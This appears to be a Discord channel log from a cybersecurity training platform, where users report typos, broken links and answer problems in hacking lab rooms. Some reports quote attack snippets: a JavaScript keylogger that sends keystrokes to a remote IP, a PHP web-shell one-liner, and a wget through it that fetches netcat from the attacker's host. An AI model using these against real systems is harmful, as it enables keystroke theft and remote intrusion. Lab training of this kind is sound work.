#room-bugs
I think the screenshot highlights the whole command so it wasn't as obvious you mean the syntax
Nice catch thanks (: updated
Np 
I think in the active directory basics lab, it should be other objects instead of other OUs?
why's that? they can and often do contain other OUs inside of them
oh ok sorry i didn't know that
Should be Task 7 instead of Task 6, as task 6 was a practical with Gobuster
Also each word here is spaced a lot here in Task 8
Same Task and same problem as above very spaced, not sure if it's intended to be typed out like that
Thanks @topaz thorn good catch -- resolved. Re. the text being spaced I can't seem to replicate it O.o
Looks okay to me -- nothing in the HTML code either mhhhhm
Gave +1 Rep to @topaz thorn
Hello everybody, I'm stuck on this question in Physical Security Intro room. And it looks like a bug.
https://tryhackme.com/room/osqueryf8 Task 5: where the username is 3 characters long and ends with 'en' <- the question does not match the answer, WHERE length(username) = 3 AND username like ...
Typo in the new osquery room, task 1 "AlienTvault" (the T)
there is a small error/typo in the new walkthrough room osqueryf8 in task6 http://127.0.0.1:8080 should be https i think =)
pretty sure it's not a bug, did you watch the videos?
Try a different query using the _ wildcard
Good catch. We'll fix this
Hello, I am doing the MITRE room on task6, the link to APT29 appear to be broken (404).
I'll let the creator know.
Someone submitted a git issue for this yesterday as well
https://github.com/mitre-attack/attack-evals/issues/34
Or you can check it out from wayback
https://web.archive.org/web/20201101054053/https://attackevals.mitre-engenuity.org/APT29/
Thanks a lot!
No problem. The url was updated 
In the "RootMe" room on Task 2 the last question is "What is the hidden directory", and I found one and was able to upload a reverse shell. It keeps telling me that my answer is incorrect though.... Is this a bug??
oh forget it, it wanted the answer in another format...
Can I write a suggestion?
If it's to do with the site then better putting it at https://tryhackme.com/feedback. If it's to do with a room then of course, go for it
done thank you
there is a bug in room DIFFERENT CTF, it can be rooted in one minute..
Is it the overlayfs exploit?
Because if so that affects virtually everything
(but also we have a temporary patch)
yes
AWS will hopefully release an updated kernel soon. Until then, we have a force patch
noted
could it be that the password for the new room is expired ?
osquery?
no WindowsCTF
Ohh
i actually guessed the "correct" one for the thm interface
and if i try it on smb or rdp it gives password expired
ssh does not give much of a feedback even in verbose
Yea I think I may know why, I just pinged one of the admins
Hi guys, following the instructions on Task 7 of XSS Playground seems to crash the server.
I don't know enough to even start suggesting why, but the code I tried is:
<script type="text/javascript">
  let l = ""; // Variable to store key-strokes in
  document.onkeypress = function (e) { // Event to listen for key presses
    l += e.key; // If user types, log it to the l variable
    document.querySelector('#cont').innerHTML='<img src="10.10.188.92/log/' + l + '">'; // update this line to post to your own server
  }
</script><div id="cont"></div>
WebOSINT room, last question of Task 2: "What country is listed for the registrant?". The answer should be Iceland, not Panama anymore.
use double quotes
idk i think it doesnt matter , i did all of them double quotes
Bug bug room bug or maybe not.
i was doing tony the tiger and i couldnt find port 8080 open
but it asks for whats running on 8080
i tried restarting the box still it shows that its closed
ahh its java nvm
It takes forever to boot, yeah
That's a known bug, the site devs are looking into it at the moment
Splunk Task 2 - Splunk forum location still not updated and since it appears to have been requested multiple times: <not-questions-but>.splunk.com ---- hint for anyone digging like me stuck on an outdated question without any hint as a roadblock to actually getting to course content.
Directed to report a Literature bug on:
/room/bpsplunk:
Task 2 Can you dig it?
Answer Format: ******
The word 'rename' should likely replaced with a more accurate word like 'locate' to avoid confusion. Thank you!
Room Link : https://tryhackme.com/room/attacktivedirectory
Room Name : Attacktive Directory
Task 6a : Using utility can we map remote SMB shares?
Hint : man tool_name will tell you a little bit about the tool!
Answer : it is a tool name
But look at the question now it didn't ask for the tool name
Question would've been
Which utility can we use to map remote SMB shares.
it's on my to-do list to completely renovate that room
Hello, I'm currently doing the "Linux PrivEsc" room and I think that the validation of the field in question 3.1 (root flag)
has a problem.
I have the right flag, after checking the write-ups because I have questioned myself, is the problem known? I have the flag if a
moderator wants to check.
Hello I am trying to do the Isac room task 8, but the password is not accepted for the RDP
?
anyone else having major problems connecting to anthem? RDP freezes pretty fast after successful login, connections via tools like winexec drop or timeout. Checked internet speed, 80 mbps should not be the problem. VPN is active
I am using remmina with kali attackbox, if it should work i will try from windows via vpn
other THM machines work flawlessly, stable and fast connection via RDP (rdesktop). Just anthem is slow as hell
Hi, just completed Yara, the sixth question in Task 11 doesn't accept what I think should be the correct details as per Valhalla. Really minor thing but maybe worth a look?
DM me a screenshot of what you believe to be the correct answer, please?
Tim- someone was asking for more power in the other channel earlier. Was SO tempted to ping you.
Thank you for reporting this.
Gave +1 Rep to @harsh nimbus
heyy, is it possible that Physical Security Intro room does not accept correct answer?
unlikely, I completed the room, some of the answers were definitely not obvious however (to me at least and I saw a few others with issues when I was googling around)
if you want some hints I can provide some better ones if you ask in room hints
Ok, thanks. I need to dig deeper I guess then. Just what I found fit perfectly to answer format, haha, but apparently is not correct
Gave +1 Rep to @oak mica
yeah unfortunately I have to say the actual answers were more 'wow ok' than 'oh I finally understand'
Yes, they are not obvious/easy, definitely
broken image on task 5 (under domain policies overview) in throwback room
This answer should be right if I am not wrong. MITRE room; task 6 ; question 3;
Examining APT29, what 2 tools were used to execute the first scenario?
answer: Pupy and Meterpreter
Answer is correct @wheat fractal
doesn't seem to work..
Nevermind I was wrong.... Answer is not correct
ahw damm
What is meterpreter a part of?
metasploit hahaa
oh damm
for real
So I'm not sure if this is the right place to report it as it is not a room bug per se but yesterday I got done with the Mr Robot CTF (https://tryhackme.com/room/mrrobot) and I had to use the walkthrough as I'm still quite new at this whole thing. Anyway, there's a point in that challenge where one has to decrypt a raw md5 hash of password. The video walkthrough uses this .dic file that is provided by the room as the wordlist. However. That list does not contain the un-hashed password. Crack station or similar sites will have it but the walkthrough explicitly shows a command that uses John the ripper, something like john hash.md5 wordlist=<file>.dic which will NOT work. Did I miss something or is it just a bit misleading?
That's more a bug in the walkthrough than the room itself. Perhaps the room changed after it was written. Generally, the writeups are made by people other than the room creator
I believe in this case it was the author of the room, DarkSec. But I would agree, the issue i had is with the walkthrough, not the room.
The room is unlikely to have changed
On the room "Network Services" at Task 9 on enumerating the FTP, the first question How many ports are open on the target machine?. The answer appears to be 2 while doing an Nmap shows only 1 port open
As @cedar grail said, there's a bug with Linux 3: https://i.imgur.com/9DnmOG9.png
Should be they're not their
it's literally in the first line
(linux3)
Edited! 

I was doing the owaspjuiceshop room In task-4 Q1: I am not able to get the answer. it is not showing up. can someone have a look?
Did you run nmap on all ports, with -p-?
Fixed. Thank you for reporting.
Gave +1 Rep to @woven pawn
i got no rep 
thanks @cedar grail
Gave +1 Rep to @cedar grail

https://i.imgur.com/f3ncKsA.png
Another one, not sure what this one is supposed to be though
https://i.imgur.com/QG9uYwC.png
And another one
Yes I did
Hi, I don't know if it's a bug or the steps to escalate privilege have changed
This is regarding task 18 - Accumulate of room Advent of Cyber 1 [2019]
I was going for the 3rd question.
Elevate privileges and read the content of root.txt
after banging my head for 1 hour, trying to understand how to go about it, I finally decided to give up and looked for a writeup
the writeup says that we have to search in the google chrome history, but to my surprise, when I logged into the machine, google chrome was not even installed.
I terminated and started the machine again, and still the same issue.
Is this a bug, or the process for this sub task has been changed?
It was replaced with Blaster
Which is a slightly modified version of the box which makes the vuln even easier to exploit
Blaster?
so im on windows priv esc and im on task 3, when i try "net start daclsvc" it throws a error
"Invalid command: net start
"
then a usage manual
In Blaster https://tryhackme.com/room/blaster there's similar bug.
Task 3, question 1. It says to look into the browser history to find out which CVE was researched on this computer. When I've looked up the history, there was nothing like that. In the end I have checked the walkthrough, and there, in the browser history was a record of a CVE search
This is a screenshot of the accessed machine https://ibb.co/sFXk2gb
hi. Went back to finalize the Enterprise room, but now it tells me that the user password has expired. I am pretty sure this is not by purpose as it worked the last time I worked on the room.
Room network services 2 Task 6.
The msf module does not work on msf6 but does work on version 5.
Seclists package is not included in attack machines and can't be installed.
Seclists is already on the attack box, just a slightly different path
Which user accounts password expired?
bitbucket
interesting. I'll look into it later today. Thanks for reporting
thanks.
@dusky junco @lucid oasis if either of you are available, would it be possible for you to clone a running instance to my account?
IP is 10.10.160.91 machine title is Enterprise v1, new machine title will be Enterprise v2, save to: Sq00ky
Cloning now - How much GB does it need?
Ping me again when you reply - otherwise I'll miss it
currently it's running 2GB
I'm on VIP -- but I know the machine needed a resource bump to begin w/
Sorry I mean storage space?
23GB in use, 60GB total, 37 free
nice - cloning with 30
Added to your account, wait 20 minutes before trying to deploy
awesome, thank you! ❤️
was the enterprise room problem fixed?
It should be as long as nothing went wrong with the instance cloning.
gotta love Windows
working on privEsc now
yeah worked. just finished
intro2windows task 3 spelling error 3rd question assings > assigns
Fixed. Thank you for reporting.
Gave +1 Rep to @hallow depot
In "Hacking with powershell" a "wrong" answer is accepted.
I missed a "t" in Installer and it accepted.
Answers have a tolerance of "wrongness" so you can mistype things slightly and it will accept it. This is for various reasons, if you refresh the page the correct answer will appear.
Okay. Didnt know that. Interesting. Thanks
Gave +1 Rep to @vast cypress
https://tryhackme.com/room/xss
Task9 last paragraph XSS-Payloads.com is not accessible anymore.
Last recording of the original site is https://web.archive.org/web/20201229164253/http://www.xss-payloads.com/
Looking for help. In the Authenticate room, Dictionary attack section I'm not getting any results for Jack's password through Burp OR Hydra. I've looked at both the walkthroughs and I'm doing everything right, I'm just not getting any results. Anyone have any ideas?
I'm calling this a bug as I cannot find any information or solution as to why this problem is happening. On the Burp Suite room I am supposed to capture a response with the "Set-cookie" heading. For two days now, no matter what I do on the web page (from just browsing to creating and logging into an account all the way to "buying" something) I cannot get the set-cookie flag. Some other things I have tried; allowing third party cookies in firefox, refreshing multiple times with both the refresh and ctrl f5, disabling ublock and privacy badger, using the filter option to make sure I just wasn't missing it.
Are you seeing requests with Cookie?
yea lots, I see cookie and cookieconsent but no responses
Moved to #subs-room-help
Hi. I have a weird problem in the "Tutorial" room. If I press the "Join room" button, I get redirected to the "How to use TryHackMe" room, which I have completed earlier. (Of course there is no real reason to do the "Tutorial" room for me, but it would be nice to complete it to get rid of it being at the top of Hacktivities sorted by "Most popular")
I think I found an error with the flag provided for OWASP Juice Shop / Task 5 / Question 3 | The flag appears to be incorrect even after visiting the scoreboard page and re-prompting the toast notification
John the Ripper is showing ssh2john as python3 script, I don't think it has been updated to that yet
or may just want to make a note that older script is python2
Hi, not sure if this is a bug, but i just joined room OhSINT and i am trying to download the picture on this room, but seems that its just jpg should it be like that ?
shouldn't it be like picture.jpg ? or its a catch ?
nvm
Not sure if this qualifies as a bug
Volatility room: downloading with apt-get install volatility as suggested on a kali machine outputs an error: Unable to locate package volatility
Downloaded from https://www.volatilityfoundation.org instead.
Enumerating FTP room the machine for that isn't populating an IP: IP Address Shown in 00s
I've restarted it like 6 times so far
It's a site issue
How long is it gonna take to fix this ip thing?
No one could possibly know
It was working like two days ago so I hope it will be back up soon.
A fix is being pushed as we speak ((: just need to wait for it to roll out to all the servers
hello, room: https://tryhackme.com/room/rpmetasploit
I can't go further at the end because the command is not working.. I saw the video for help but for me it's not working...
"Additionally, we can start a socks5 proxy server out of this session. Background our current meterpreter session and run the command search server/socks5. What is the full path to the socks5 auxiliary module?"
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(windows/http/icecast_header) > search server/socks5
[-] No results from search
msf6 exploit(windows/http/icecast_header) > search server/socks4
[-] No results from search
msf6 exploit(windows/http/icecast_header) > search server/socks5
[-] No results from search
msf6 exploit(windows/http/icecast_header) >
can anyone help me with this?
thanks but I cannot understand why the search is not finding anything
I just took a look, it's been a long time since I did this room, the basic answer is it's not finding it because there isn't anything called socks5 in there! Maybe it was renamed? If you search on /auxiliary/server you'll see everything on that path. There is SOCKS, but no socks5, so this is why. I guess the question needs editing, perhaps this is a change in msf6
That room is a little outdated. The modules have changed names
I see thank you!
you're welcome
Hi guys, I need help. I have successfully completed all questions under except one in the room of OWASP Juice Shop.
Question found in Task 5: AH! Don't look!
Question #2: Log into MC SafeSearch's account!
Answer I found: b03f4b0ba8b458fa0acdc02cdb953bc8
I have successfully hashed the password. But it doesn't accept my answer when i click on submit.
Please assist.
@eternal summit the flag filename and what you have in the question are not the same for the OverlayFS room
Fixed

OWASP Juice Shop room, I can't seem to get the flag to generate after accessing the admin account like it said I should.
Okay so this is weird. I opened two browsers; one is firefox where I am on the juice shop site and capturing with BurpSuite. The other is LibreWolf where I have the tryhackme page up. I tried bringing up JuiceShop in LibreWolf. I then moved on to accessing benders account. I accessed the account on the firefox browser but got the flag on the librewolf browser.
No matter what I try it simply won't give me the flag for logging into the admin's account. I'm really not sure what I'm supposed to do here
repost from #site-bugs :
I guess the issue already been reported but I really want to do this room so I wanted to report that the "learn Rust" room isn't loading
Not really a room bug, as it's a site bug like I said.
Hey! Not really a bug, but maybe an oversight. In Linux part 3 in task 7 we should make a directory and file, but they are already there. Also, what happen to the tiny hacking task at the end of Linux 'path'?
I'm wondering if maybe the flag is being intercepted by burp. iirc, those flags are essentially popup messages that are triggered when you use the exploit, so that data has to come back to the browser.
guys the room splunk has bug, when i open firefox and put ip:8000 to see the webserver it say no connection
are you on the deployed machine
@civic brook yes and i run the box
The IP of the attackbox, or of the deployed machine?
Room: Investigating Windows. Question: 10
you need to be a little more specific -- what is the bug?
The answer formats. One says one thing, the other another
In burpsuite room task 6 which web application hosted on VM its talking about to complete the task?
The one that you deploy in the room with the button that says "Start Machine"
The IP will be shown under Active Machine Information
Copy the IP address of the machine you deployed into an address bar (I think)
I believe this may be a typo in the "Attacking Kerberos" room
That makes sense. Maybe it could say something like "from a domain admin to another domain admin" to clarify. Just a thought
As a general rule, don't try to make @twin tapir use good English
It rarely ends well
Haha fair enough
No because that wouldn't be true... you would straight up be escalating from domain admin to domain admin kekw
That's... what you said above?
Exactly
Is it not between two different DAs?
Nope
So it's between the same DA?
moving horizontally from one domain admin to another
See, that makes sense
Moving from one domain admin to the same domain admin, does not
That would be one heck of an exploit to be able to do that haha
You see, I thought that, but
That's why it's not mentioned in the room
YOU JUST SAID IT WAS
Haha maybe I shouldn't have mentioned it
Muiri vs Cry, mortal kombat style.
I think we all know who wins that one
It seems that was correct. I turned intercept back off before forwarding and got the flag. I thought I was turning it off fast enough but apparently I wasn't.
The hacking with powershell room does not give the option to open a windows machine only linux which is useless. Anyone else have that problem?
Hey, Windowseventlogs Task 2, Question 2 needs a tweak, can I DM THM staff please? My mistake
Please just report the issue here
Essentially the answer accepted is NOT the first event
OK, ignore me - I'm an idiot today. Just need to remember the difference between first and latest!
you're fine dude, don't sweat it
hi guys
I think the MAL: Malware Introductory VM is bugged
I can't connect to it
I've been waiting more than 10 min. and it doesn't receive ICMP packets
neither RDP connection
have you tried without giving it a domain?
It could still be a bug, though
The instructions do show the ANALYSIS-PC as domain, but it does not work with it. It only works without it
it worked with it
huh. It didn't work for me
You shouldn't be touching that login, ideally you shouldn't be seeing it either.
Try SSH instead
Hi. The avengers room https://www.tryhackme.com/jr/avengers seems to have a problem. It doesn't load (just shows the loading circle) while all other rooms I try seem to work fine
Hello! Just wanted to notify whoever handles content updates that the MITRE room, Task 7 last question uses ATT&CK Framework v8.2, which is no longer live as of April 28th. Current version is v9
adventofcyber2 task 11 answerable question 1
not sure if its a bug but the answer format does not match the actual answer
question is "What vulnerability type was used to exploit the application?"
also cant show picture because I already submitted the answer but im completely sure the answer format does not have = * to the actual answer
Lots of rooms need the update by forking perhaps?
*Old rooms vulnerable for the CVE-2021-3156 Baron Samedit
I just rooted one
It's a lot of work to go back and patch rooms, you either need to patch and reupload, or get the admins to spin up an instance with internet access.
I don't see how forking factors into it.
Unless THM paid the creator for it, the creator retains all their rights to the content.
Ahh, didn't see that coming Unless THM paid the creator for it, the creator retains all their rights to the content.
You're only really cheating yourself.
i did know how to root that one.
than i decide to try something new
There's quite a few rooms with unintendeds, whether they've existed since release or a CVE in the kernel or Sudo.
Room was deleted, but still the manage link is working
why ?
room not deleted, but private/archived? You can go into by going to your rooms. https://tryhackme.com/rooms
Unless they mean a room they created, which seems likely given /manage/
its a created room
Probably a site bug not a room bug, #site-bugs
I tried deleting the material, then it showed it as attached to a task
The room was still there on the old link
Again. Probably a site bug.
What's the answer you had in mind?
https://tryhackme.com/room/intro2windows
Super silly perhaps, but:
"Windows comes equipped with two command-line tools:
- CMD
- Powershell
- Windows Terminal"
Emphasis is mine. I think Windows indeed comes with CMD and Powershell; Windows Terminal is an open source project by Microsoft, but I don't think it comes equipped with every install.
I think it's great to include that, but then the 'two' should be 'three'
I changed it to Windows comes equipped with two command-line tools (and one can be installed). Thank you for reporting.
Gave +1 Rep to @grim harness
Yup, same issue, there is no history for the task 3 q 1 on the Blaster room
room: https://tryhackme.com/room/eritsecurusi - task 5 - typo
we create c.php but after creating we're using cmd.php which can't be found.
creation: echo '<?php system($_GET["c"]);?>'>c.php
using file: http://serverip/files/cmd.php?c=wget http://yourip:8000/nc
Answer I had in mind was a 4 word answer, answering format is 3 words, answer that was correct for me was ||stored cross-site scripting||. Also for the following question in the same task it says "how many xss alerts are in the scan" and answer is ||2|| . But I'm sure I got 9-10 total XSS alerts from the scan, possibly could be worded wrong. 2 of them were post requests and the rest were get requests, so maybe the question should be changed to "How many post xss alerts are in the scan" or something like that
hello.
room: https://tryhackme.com/room/rpmetasploit#
task: 7
command from subject: search server/socks5
expected: auxiliary/server/socks5
msfconsole result: uploaded
not a bug just probably worded wrong as socks5/socks4a are both implemented as a version number and you choose between the two so the msf is just auxiliary/server/socks_proxy
ok. thanks
Gave +1 Rep to @hallow depot
that's the answer tolerance :)
if you refresh the page, the right answer will show
it's designed to be a little lenient, to account for spelling errors and such
@worthy pasture you haven't deployed it by the sounds of things.
There should be a box at the top of the page displaying the IP if you clicked the big green "Start Machine" button in the first task
Hi, page two of the "Learn Rust" room does not load for me.
Narf, I closed the tab while I was waiting on something to happen on page two and now I cannot access the room at all. It's loading endlessly
Hello Everyone! New here. Going through Linux Fundamentals Part 2 (https://tryhackme.com/room/linux2#). Currently at Task 3. Seems like I can not do SSH or even ping the machine. Have tried to start machine and terminate it multiple times. No other machines are running. Is this a known issue or I'm doing something wrong? Thanks in advance!
Are you using the attackbox or a VPN?
attackbox
I just finished linux2 and it worked without an issue. Please double check you have no other VMs running by going through the other rooms: https://tryhackme.com/rooms and then also make sure you're using the correct IP to connect to.
Yes, confirming, it was my issue. It works fine now. Thanks @craggy agate !
Gave +1 Rep to @craggy agate
Cool, have fun!
Yep that was it, I had started and came back to it later.
Well fixed!
Again a really small one: https://tryhackme.com/room/activedirectorybasics there's a sentence that really ought to be 2 sentences:
"The type of trusts put in place determines how the domains and trees in a forest are able to communicate and send data to and from each other when attacking an Active Directory environment you can sometimes abuse these trusts in order to move laterally throughout the network."
There should be a period after 'each other' and a capital When.
"The type of trusts put in place determines how the domains and trees in a forest are able to communicate and send data to and from each other. When attacking an Active Directory environment you can sometimes abuse these trusts in order to move laterally throughout the network."
No, you have not been
ok I can't see it anymore
did the "support" section get collapsed/some channels got hidden?
Click this arrow and all the channels will appear
i have tried way back machine once but, it was quite messed up
yeah idk I tried waybackmachine but still dont know lmao I just found it by googling which is basically osint
we love relying on external resources lol
its in the blood.
there is another website I used https://breachdirectory.tk/
Check If Your Email or Username was Compromised
In the Lian_Yu room the vid is no longer there
Can I pm any admin regarding the broker room? I think there might be an unintended way to privilege escalate to root.
Is the ISO27001 room being reviewed for grammar mistakes? I checked the channel and they mention quite some errors but they haven't been changed as of yet (dated Feb/Mar)
You'd want to talk to the room creator most likely, admins are more site based
Ok
https://tryhackme.com/room/mrrobot
pages like ||/robots|| are delivered instantly but pages like ||/wp-login|| take about 3 min to be delivered, it's so long that I thought that it was a rabbit hole with an intended timeout. The box has been launched an hour ago so it's not like the service has not started yet.
Oh, I think it was probably my ffuf that was DoSing the php server, the VM is not very resilient and very resources limited.
I stopped my ffuf but the VM is still slow
That will be painful as some BF is intended.
https://tryhackme.com/room/xxe / Task 3
element is in <code> instead of body
https://tryhackme.com/room/ssrf / Task 1
server-side forgery request instead of server-side request forgery
In Room : Introductory Researching : (https://tryhackme.com/room/introtoresearch)
IDK if this is significant enough but, there is a small error(now) as "fuelcms" is written as "fuel cms"(with the space in the middle)
SO it makes sense to update it in the room
@obsidian kiln
afaik the results the same if you were to put "fuelcms" but I'm just checking now ((: if it doesn't I'll update
mhh yeah seems to give different results -- I'll put both suggestions i.e. searchsploit fuelcms & searchsploit fuel cms
i swear searchsploit updated their search to be more regexy and find exploits easier
I also swear, but half the time when I go try to search with it, it never works 
Fixed. Thank you for reporting.
Gave +1 Rep to @ruby swift
Fixed as well.
Wrong video for the room dogcat
Hello, I believe there is a mistake in the vulneversity room
shouldn't it say Go to payload, select the extension files we just created
then go to "position", select Sniper mode and ....
maybe its my Burp version but in mine Payload is to select the file and position to select the mode and the selected word to fuzz
thank you for looking into it
Gave +1 Rep to @dusky junco
Adventofcyber2 day 24/last day "- - Download build-alpine on your local machine via the git repository" git repository links to - - https://github.com/lxd-images/alpine-3-7-apache-php5-6 instead of https://github.com/saghul/lxd-alpine-builder although it isnt needed to answer the questions since the machine already has an lxc image container on it
Hey, not really a bug, but in Burp room there is a link to other room which is not available anymore ('Owner has made this room private'). Task 9
Typo/poor wording in room commonlinuxprivesc, task 6: "...write access to the /etc/passwd must only limit for the superuser/root account." This should probably be something more like "write access ... should only be allowed for the ...root account"
Hey, page 2 of the "Learn Rust" room does not load at all. https://tryhackme.com/room/rust
owasptop10 room is paid now ?
Found a text bug in the uploadvulns room task 3 https://tryhackme.com/room/uploadvulns
"can extremely be very helpful" should be "can be very helpful" or "can be extremely helpful"
In the Corp room it takes ages to type into powershell, compared to cmd
This problem persists even while starting powershell as cmd's child process
To add on to its slowness, the administrator password is expired and requires to be changed upon logon, which is a very lengthy task looking at its high complexity
A very minor bug (?) in the "Linux Strength Training" room. The last question in the "Working with files" only works if the moved file is in the current directory, while the instructions ask for it to be put in the same directory as the script. (E.g. if the file is moved to the directory, but then the script is run with ~/xxx/yyy/zzz.sh it fails with "... not in this directory, please move it to here" as the script checks the current directory (with test -f "$FILE")
https://tryhackme.com/room/webenumerationv2
Room: Web Enumeration
Task 4: 1.1. Gobuster Modes
- Using "dns" Mode
gobuster dns -d http://mydomain.thm ...
is wrong. You don't need http:// when dns mode.
correct:
gobuster dns -d mydomain.thm ...
In room https://tryhackme.com/room/jvmreverseengineering the images in the tasks are missing
That looks like an interesting room. Judging by the creator's profile, I'm going to guess he/she isn't active enough to fix that. I don't know who/how that gets handled
I think there is a minor error in the new tshark room
?
the final 2 questions.
If you filter the DNS output two of the letters in the result are swapped
Worked when I submitted it
yeah except when you put it through cyberchef the flag is not 100% correct.
the tolerance lets it go in
the B and Q next to each other in the string
In the room https://www.tryhackme.com/room/malresearching the last image under "Checksums 101" is the same as the first image, and seems to be wrong
there is an issue with task11.6 of Yara ROOM any maintainer of this room here ?
it seems that the highest rule match per month moved recently
the old answer is no more true
@hazy hinge & @dusky junco that's probably for you ...
Which link are you referring to?
I've added this to the problem list.
It's a free room.
The original sentence is grammatically correct according to both Grammarly and ProWritingAid.
It's certainly confusing and clunky
(It's also a 3AM mistake. Fixing it)
Fixed. Thanks for reporting @coral shadow
Gave +1 Rep to @coral shadow
Muiri, you should make it clear at the top of each room that you created it. So I can read the text in a Scottish voice.
Fixed. Thank you for reporting.
Gave +1 Rep to @trail bramble
Added to the Problem List. Thank you for reporting.
hey Tim, while you're here
I'd be willing to volunteer some time to fix some of the easier/"low hanging fruit" type stuff
not sure how useful that would be, but 🤷‍♂️
Can you please provide a screenshot of the newest rule match? Is it 2021/4?
That's great! Feel free to post them in here regarding your findings.
I also meant from a room creator/editor perspective. Not sure what your backlog of issues looks like or what it takes to resolve them
New rooms go through a room testing phase, which is handled by the marvelous room testing team. Issues for released rooms get fixed on a reported basis; mostly from reports in this channel, but also based on other room metrics that we gather. Periodically room content gets reevaluated and redone.
We really appreciate all the reports we get daily from users. I think it is vital to have that type of feedback from our users. User feedback is a vital part of Content Quality. ♥️
and a good qa tester
Bah, who needs testing, just ship the beta and let the users do the testing
(no, I'm not really a product manager)
See, my metric matrix can show 99.8 score for all rooms, but that number means very little if user feedback says otherwise.
It probably would mean I would be gathering the wrong metrics.
They say you can only optimize for what you track, and most people track the wrong things 🤷‍♂️. Not trying to be snarky, just a common software engineering axiom. I think this place is great (obviously)
That's very true. That's why Agile is more useful (to some extent) as it is user-stories based. But if you have user-stories that don't align with what the customer wants, you're still dead in the water. hehehe
Probably one of the more honest books on Agile (iterative) development (and quality) is: Clean Agile: Back to Basics by Robert C. Martin. I highly recommend it before reading any other Agile book.
I've read that, actually, but it's been quite a while. I think I've read a couple other books from him too
My favorite is: Reasonable expectations: QA Should Find Nothing hahaha
lol. Should, perhaps. I've never, EVER seen that happen in reality
The link which says "For some additional practice on using Intruder, check out the older Learn Burp Suite room here on TryHackMe", task 9. Line above last in text. https://tryhackme.com/room/rpburpsuite
When you refresh the page, does it show /room/learnburp? Because that is what I am seeing. @wheat fractal
I see this:
I am subscriber, if it makes any difference.
Aah, now I see what you mean. Yeah, the room learnburp has been set to private. I will inquire why that is with the room creator. Thanks for reporting. @wheat fractal
Gave +1 Rep to @torn bluff
You're welcome. Thanks!
Gave +1 Rep to @glad badger
Thanks!
Gave +1 Rep to @glad badger
Don't know why I was getting you Have to be subscribed to spawn this machine. I logged out & logged in again then everything was fine don't know what happened there 🤷‍♂️
Hi guys in the OWASP top 10 room in task 7 I successfully logged in as darren and see the flag. It only doesn't allow me to copy the flag which means I have to type the whole flag manually. I could also just be making a mistake but who knows.
is it on the web page?
yeah
you can view page source and copy
already just typed it over but that would indeed be easier xd
thanks for reporting. the answer was updated.
Gave +1 Rep to @strange crow
Hi, not exactly a bug - just an update to msf causing some issues for user's running their own vms. "Learn to use Metasploit" room, Task 7 , Q 2, due to msf changes from 20th Jan: "PR 14566 - Removed the auxiliary/server/socks4a and auxiliary/server/socks5 modules from Metasploit. Their functionality is now combined into a single module, auxiliary/server/socks_proxy, to prevent code duplication." - providing the correct answer is not possible when not running attackbox.
The room is just a little outdated at this point, but I was able to figure out the answer from the format hint, so it doesn't completely break the room.
Hi everyone! I think there may be an issue with the https://tryhackme.com/room/networkservices room. For task 9 on Enumerating FTP, the attached target machine does not appear to have all expected ports open. Writeups I've seen state that it should have tcp/21 and tcp/80 open. I've opened the machine a couple times, and can only ever see tcp/21. This causes an issue with the first question since it's asking for the number of open ports.
It takes forever to start that service
Ahh I see. Thanks for the heads up! I double checked since I still had the machine running. Looks like it's there now. Just need to be a bit more patient
It takes time to start up fully
oh sorry
but the other subdomain works well
Ok.
I tried starting the machine for tomghost(free room) and it said "You need to be subscribed to start this machine"
After refreshing the page, it worked tho.
I've seen this cropping up a few times, perhaps worth investigating cc @dusky junco
Not just this room
Hi, I am facing a problem in Task 7. Juice Shop
Question 2
I did the persistent XSS but it's not giving me the flag.
@eternal summit
Please don't just ping me because you want help. Everyone here is a volunteer.
Please go and ask in #room-help
ooh okay, I did not know that, I am sorry.
It's a bug, I already solved it, I don't think room-help would be able to help me
But anyways I'll try.
Ok then report it here. No reason to ping me here tho.
I said I am sorry, will take from next time
└─# ls
CHANGELOG.md LICENSE README.md Rubeus Rubeus.sln Rubeus.yar
Attacking kerberos room
required "Rubeus" doesnt run on kali :v
even on their screens they are running windows
oh i got it i need to ssh into their windows machine and from there attack :C
ye thanks
Gave +1 Rep to @eternal summit
ok rip
now i am on Windows Server v1.1
and i cant run PowerView.ps
PS C:\Users\Administrator\Downloads> . .\Downloads\PowerView.ps1
. : The term '.\Downloads\PowerView.ps1' is not recognized as the name of a cmdlet, function,
script file, or operable program. Check the spelling of the name, or if a path was included,
verify that the path is correct and try again.
At line:1 char:3
- . .\Downloads\PowerView.ps1
-
+ CategoryInfo : ObjectNotFound: (.\Downloads\PowerView.ps1:String) [], CommandN
otFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
like WaT
#room-hints but your path is incorrect there

i am dumb, thanks i had to cd .. first
Gave +1 Rep to @eternal summit
In the tshark room, the file downloads as .cap, is this intentional?
Typo in https://tryhackme.com/room/crackthehashlevel2 , Task 4
🤣
It's a site bug ATM
ok
is anyone getting very poor performance on vulnnet internal
it hangs for a few minutes at a time every few minutes
https://tryhackme.com/room/zthobscurewebvulns / Task 14
generated (RS256) jwt gives the flag by default
- by providing this, a user might miss out the challenge which is generating a (HS256) jwt signed with the /public.pem file with the use of openssl and python
Fixed, thank you for reporting.
Gave +1 Rep to @soft terrace
Found another text bug - https://tryhackme.com/room/introtoshells intro to shells room, task 4. "Explaining this is outwith the scope of the room." should be "Explaining this is out of scope for the room." : Also if possible - please link to information when claiming out of scope so we can follow up if we don't know and want to know.
Nope, outwith is a word
This has come up before, Muirland is a Scot and is allowed
it's still horrible english and bad form for training materials.
Sure, but regional dialects are not appropriate for training materials. (Something I should know with my experience teaching English as a second language)
In that case the Americans are screwed -- Americanisms are one big regional variation of English
lol I don't disagree
I mean, googling the word in the U.S. does get you the definition, so it's not some secret
Just saying that it would be more understandable and better quality with the change to more standard terms.
And the end of the day, it's muir's room and he can do what he wants
I suspect the Americans may also disagree with you
I dislike the idea of stripping the character out of rooms in that way
Hell, Offsec materials are written in American English -- I assume those are also poorly written?
The second point, however, is maybe worth it?
I'd imagine the same goes for INE, for that matter
Including/mentioning the material that's out of scope is probably a good idea
the ine materials are just garbage in general
Muiri ... honestly yeah... a lot of training material is pretty terrible
Heh, I'll ping TJNull if you wanna say that to his face?
Tis all good - consider it an improvement suggestion. I think it would be cool to see THM gain more traction and be considered the de facto training solution.
It would, but it can do that quite nicely with some of us writing in American, some us writing in Scots, and absolutely no one writing in Queen's English
haha aye, no one needs that pompous stuffy crap
I complained about the very same thing, and got the very same response. But we love Muiri, and he makes awesome rooms, so as James said, he can kinda do what he wants
I too, would like extra context on lots of stuff though. Usually I google or read man pages or whatever, but the quality is hit or miss at times
